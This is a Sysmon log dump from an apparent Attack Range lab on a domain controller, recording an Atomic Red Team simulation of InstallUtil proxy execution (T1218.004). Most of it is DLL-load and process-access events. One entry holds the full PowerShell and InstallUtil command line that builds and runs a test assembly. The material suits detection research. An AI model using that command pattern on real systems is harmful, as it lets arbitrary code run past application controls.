14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057456311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057456310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057456309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057456308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057456307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057456306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057456305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057456304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057456303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057456302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057456301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057456300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057456299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057456298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057456297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057456296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057456295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057456294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057456293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057456292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057456291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057456290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-21F7-04000000F101}757210032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+77472010(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 10341000x800000000000000057456289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-21F7-04000000F101}757210032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+77472010(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a29fc(wow64) 10341000x800000000000000057456288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057456287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.972{8B6011A9-78B6-618E-21F7-04000000F101}757210032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+77472010(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+77472010(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+77472010(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+77472010(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 154100x800000000000000057456286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.973{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /logtoconsole=false /installtype=notransaction /action=install C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-78B6-618E-21F7-04000000F101}7572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/logfile= /logtoconsole=false /installtype=notransaction /action=install `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_Install_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil Install method execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 534500x800000000000000057456356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.050{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057456355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.050{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Servd1dec626#\367b724a8a8d7a8816e8029637e9af91\System.ServiceModel.Internals.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.ServiceModel.Internals.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.ServiceModel.Internals.dllMD5=D9D712B2F98C74C18C71B40FBFF12C72,SHA256=C1CB9C1223FFBBFA879B7972A34AD437C308829152CFF855802A6350C75B46A7false-Unavailable 734700x800000000000000057456354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:47.034{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\SMDiagnostics\32788288a07982cb10ab4196907ef578\SMDiagnostics.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSMDiagnostics.dllMicrosoft® .NET FrameworkMicrosoft 